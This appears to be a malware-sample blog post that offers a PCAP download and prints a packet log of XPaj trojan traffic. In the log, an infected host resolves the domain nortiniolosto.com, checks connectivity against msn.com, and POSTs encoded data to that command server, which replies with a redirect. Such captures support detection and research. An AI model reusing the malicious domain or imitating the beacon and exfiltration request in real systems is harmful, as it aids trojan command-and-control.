XPaj Malware Trojan Packet Analysis Download PCAP Sample

By | January 29, 2016

 

Download XPAJ PCAP Sample : xpaj.pcap

 

2012-05-02 16:18:32.092414 IP 192.168.254.194.49734 > 8.8.8.8.53: 34837+ A? nortiniolosto.com. (35)
E..?R……r………F.5.+……………nortiniolosto.com…..
2012-05-02 16:18:32.235179 IP 8.8.8.8.53 > 192.168.254.194.49734: 34837 1/0/0 A 208.91.198.30 (51)
E..OG;..8.k……….5.F.;.)………….nortiniolosto.com………………[..
2012-05-02 16:18:32.240585 IP 192.168.254.194.64504 > 8.8.8.8.53: 55906+ A? msn.com. (25)
E..5R……{………..5.!l..b………..msn.com…..
2012-05-02 16:18:32.256362 IP 8.8.8.8.53 > 192.168.254.194.64504: 55906 1/0/0 A 65.55.206.203 (41)
E..E.T..8…………5…1…b………..msn.com…………..F..A7..
2012-05-02 16:18:32.260152 IP 192.168.254.194.63549 > 65.55.206.203.80: Flags [S], seq 490089477, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4R.@………A7…=.P.6,……. .=……………
2012-05-02 16:18:32.344033 IP 65.55.206.203.80 > 192.168.254.194.63549: Flags [S.], seq 4152198374, ack 490089478, win 8190, options [mss 1460], length 0
E..,.-@…+0A7…….P.=.}…6,.`….{……..
2012-05-02 16:18:32.344200 IP 192.168.254.194.63549 > 65.55.206.203.80: Flags [.], ack 1, win 64240, length 0
E..(R.@………A7…=.P.6,..}..P…’F..
2012-05-02 16:18:32.348033 IP 192.168.254.194.63550 > 208.91.198.30.80: Flags [S], seq 1106937627, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4R.@…R……[…>.PA……… .7……………
2012-05-02 16:18:32.348376 IP 192.168.254.194.63549 > 65.55.206.203.80: Flags [F.], seq 1, ack 1, win 64240, length 0
E..(R.@………A7…=.P.6,..}..P…’E..
2012-05-02 16:18:32.402364 IP 208.91.198.30.80 > 192.168.254.194.63550: Flags [S.], seq 3344325677, ack 1106937628, win 5840, options [mss 1436,nop,nop,sackOK,nop,wscale 7], length 0
E..4..@.9….[…….P.>.V\-A……..:…………..
2012-05-02 16:18:32.402500 IP 192.168.254.194.63550 > 208.91.198.30.80: Flags [.], ack 1, win 258, length 0
E..(R.@…R#…..[…>.PA….V\.P…s…
2012-05-02 16:18:32.409570 IP 192.168.254.194.63550 > 208.91.198.30.80: Flags [.], seq 1:1437, ack 1, win 258, length 1436: HTTP: POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh HTTP/1.1
E…R.@…L……[…>.PA….V\.P…….POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh HTTP/1.1
Host: nortiniolosto.com
Content-Length: 1279
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

filename=rteacs.brz&data=……….B+…3.~Fo.G………).’ZuY….U.6e]r`Ye.m. .’G…..RU….O…….R…T.)…….>]……_.h…C..7.J……_l)j&..(…#.A.OB.|..W.
…K.”)…&P].M7..%….W?/..~..;..?z…Q..dg….$…I..C….c/…..5M?.i…….vX.f..sM,.h}’..R
.04.h.p..Y@u.f..p.Wf;….g.$)eO….7..{5…b.(.)..”0Y….raX..t…[…r..
<.8.=…]-….G….y…F<.l)T….01s….o&d……….U….|.i.*ga…….&[n0%……………/..Hj.^.8..3_……7~\QW”x..@.u.s.w…M.*…_1′.y….
A.O….K}…..&.. .1BOU…T.n…M.>W…G4….a.A..F.5……….7#.{CH7..-z.].t…..W6….k$6C…..Q47..)..J.^.F.2..0..j…].G.d….AH…I…………5.r..W.a…(……….fL1kQ…….P.@lF)q.E=.v..V….D. .1j..f..c.?i&……b%……./ji………,……z…..Ck….3..L.n….d..a.$u.PP..;..2G..q.,–.L.+w.-_. cE.”..C…”.Hb`.

2012-05-02 16:18:32.449317 IP 208.91.198.30.80 > 192.168.254.194.63550: Flags [P.], seq 1:842, ack 1722, win 91, length 841: HTTP: HTTP/1.1 302 Found
E..q..@.9.V..[…….P.>.V\.A…P..[.0..HTTP/1.1 302 Found
Date: Wed, 02 May 2012 21:18:31 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6
Location: http://nortiniolosto.com/cgi-sys/suspendedpage.cgi?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh
Content-Length: 462
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href=”http://nortiniolosto.com/cgi-sys/suspendedpage.cgi?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&amp;ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh”>here</a>.</p>
<hr>
<address>Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6 Server at nortiniolosto.com Port 80</address>
</body></html>

2012-05-02 16:18:32.449349 IP 208.91.198.30.80 > 192.168.254.194.63550: Flags [F.], seq 842, ack 1722, win 91, length 0

 

Share Button